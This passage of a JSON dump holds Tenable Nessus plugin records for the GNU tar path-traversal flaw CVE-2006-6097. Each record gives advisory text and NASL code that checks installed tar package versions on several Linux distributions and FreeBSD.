(!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0749\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"tar-1.13.25-6.AS21.1\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"tar-1.13.25-15.RHEL3\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"tar-1.14-12.RHEL4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tar\");\n }\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:00:21", "references": [], "pluginID": "27463", "description": "This security update fixes a directory traversal in tar, where unpacked symlinks could be followed outside of the directory where the tar file is unpacked. (CVE-2006-6097)\n\nThis feature was made optional and needs to be enabled with a commandline option.", "edition": 5, "reporter": "Tenable", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : tar (tar-2351)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:tar"], "id": "SUSE_TAR-2351.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27463", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update tar-2351.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27463);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/07/19 23:54:24\");\n\n script_cve_id(\"CVE-2006-6097\");\n\n script_name(english:\"openSUSE 10 Security Update : tar (tar-2351)\");\n script_summary(english:\"Check for the tar-2351 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update fixes a directory traversal in tar, where\nunpacked symlinks could be followed outside of the directory where the\ntar file is unpacked. (CVE-2006-6097)\n\nThis feature was made optional and needs to be enabled with a\ncommandline option.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"tar-1.15.1-42.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tar\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:09:45", "references": ["http://www.nessus.org/u?82740921"], "pluginID": "24659", "description": "New tar packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0 to fix a security issue.", "edition": 5, "reporter": "Tenable", "published": "2007-02-18T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 8.1 / 9.0 / 9.1 : tar (SSA:2006-335-01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-08-09T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:11.0", "p-cpe:/a:slackware:slackware_linux:tar", "cpe:/o:slackware:slackware_linux:10.2"], "id": "SLACKWARE_SSA_2006-335-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24659", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-335-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24659);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/08/09 17:06:37\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_xref(name:\"SSA\", value:\"2006-335-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 8.1 / 9.0 / 9.1 : tar (SSA:2006-335-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New tar packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, and 11.0 to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.469379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?82740921\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"tar\", pkgver:\"1.16\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:12", "references": [], "pluginID": "27968", "description": "Teemu Salmela discovered that tar still handled the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.10 / 6.06 LTS / 6.10 : tar vulnerability (USN-385-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-08-15T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:tar", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-385-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-385-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27968);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/15 12:24:48\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_xref(name:\"USN\", value:\"385-1\");\n\n script_name(english:\"Ubuntu 5.10 / 6.06 LTS / 6.10 : tar vulnerability (USN-385-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Teemu Salmela discovered that tar still handled the deprecated\nGNUTYPE_NAMES record type. This record type could be used to create\nsymlinks that would be followed while unpacking a tar archive. If a\nuser or an automated system were tricked into unpacking a specially\ncrafted tar file, arbitrary files could be overwritten with user\nprivileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.10|6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.10 / 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.10\", pkgname:\"tar\", pkgver:\"1.15.1-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"tar\", pkgver:\"1.15.1-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"tar\", pkgver:\"1.15.91-2ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tar\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:16", "references": [], "pluginID": "27462", "description": "This security update fixes a directory traversal in tar, where unpacked symlinks could be followed outside of the directory where the tar file is unpacked. (CVE-2006-6097)\n\nThis feature was made optional and needs to be enabled with a commandline option.", "edition": 5, "reporter": "Tenable", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : tar (tar-2343)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tar", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_TAR-2343.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27462", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update tar-2343.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27462);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/07/19 23:54:24\");\n\n script_cve_id(\"CVE-2006-6097\");\n\n script_name(english:\"openSUSE 10 Security Update : tar (tar-2343)\");\n script_summary(english:\"Check for the tar-2343 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update fixes a directory traversal in tar, where\nunpacked symlinks could be followed outside of the directory where the\ntar file is unpacked. (CVE-2006-6097)\n\nThis feature was made optional and needs to be enabled with a\ncommandline option.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"tar-1.15.1-23.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tar\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:17", "references": ["http://www.nessus.org/u?5ed13da3", "http://www.nessus.org/u?3f45313a", "http://www.nessus.org/u?680bed9d", "http://www.nessus.org/u?050ced02", "http://www.nessus.org/u?2fb536b2", "http://www.nessus.org/u?797e22a9"], "pluginID": "23941", "description": "Updated tar packages that fix a path traversal flaw are now available.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe GNU tar program saves many files together in one archive and can restore individual files (or all of the files) from that archive.\n\nTeemu Salmela discovered a path traversal flaw in the way GNU tar extracted archives. A malicious user could create a tar archive that could write to arbitrary files to which the user running GNU tar has write access. (CVE-2006-6097)\n\nUsers of tar should upgrade to this updated package, which contains a replacement backported patch to correct this issue.", "edition": 5, "reporter": "Tenable", "published": "2006-12-30T00:00:00", "title": "CentOS 3 / 4 : tar (CESA-2006:0749)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-08-09T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tar", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2006-0749.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23941", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0749 and \n# CentOS Errata and Security Advisory 2006:0749 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23941);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/08/09 17:06:35\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_xref(name:\"RHSA\", value:\"2006:0749\");\n\n script_name(english:\"CentOS 3 / 4 : tar (CESA-2006:0749)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tar packages that fix a path traversal flaw are now available.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe GNU tar program saves many files together in one archive and can\nrestore individual files (or all of the files) from that archive.\n\nTeemu Salmela discovered a path traversal flaw in the way GNU tar\nextracted archives. A malicious user could create a tar archive that\ncould write to arbitrary files to which the user running GNU tar has\nwrite access. (CVE-2006-6097)\n\nUsers of tar should upgrade to this updated package, which contains a\nreplacement backported patch to correct this issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2fb536b2\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013434.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?050ced02\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013437.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f45313a\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013439.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ed13da3\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013443.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?797e22a9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-December/013444.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?680bed9d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"tar-1.13.25-15.RHEL3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"tar-1.14-12.RHEL4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:11:32", "references": ["http://www.nessus.org/u?0c3e93a3", "http://www.nessus.org/u?a2ae060a"], "pluginID": "23759", "description": "Teemu Salmela reports :\n\nThere is a tar record type, called GNUTYPE_NAMES (an obsolete GNU extension), that allows the creation of symbolic links pointing to arbitrary locations in the filesystem, which makes it possible to create/overwrite arbitrary files.", "edition": 4, "reporter": "Tenable", "published": "2006-12-04T00:00:00", "title": "FreeBSD : gtar -- GNUTYPE_NAMES directory traversal vulnerability (3dd7eb58-80ae-11db-b4ec-000854d03344)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2013-06-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:gtar"], "id": "FREEBSD_PKG_3DD7EB5880AE11DBB4EC000854D03344.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT 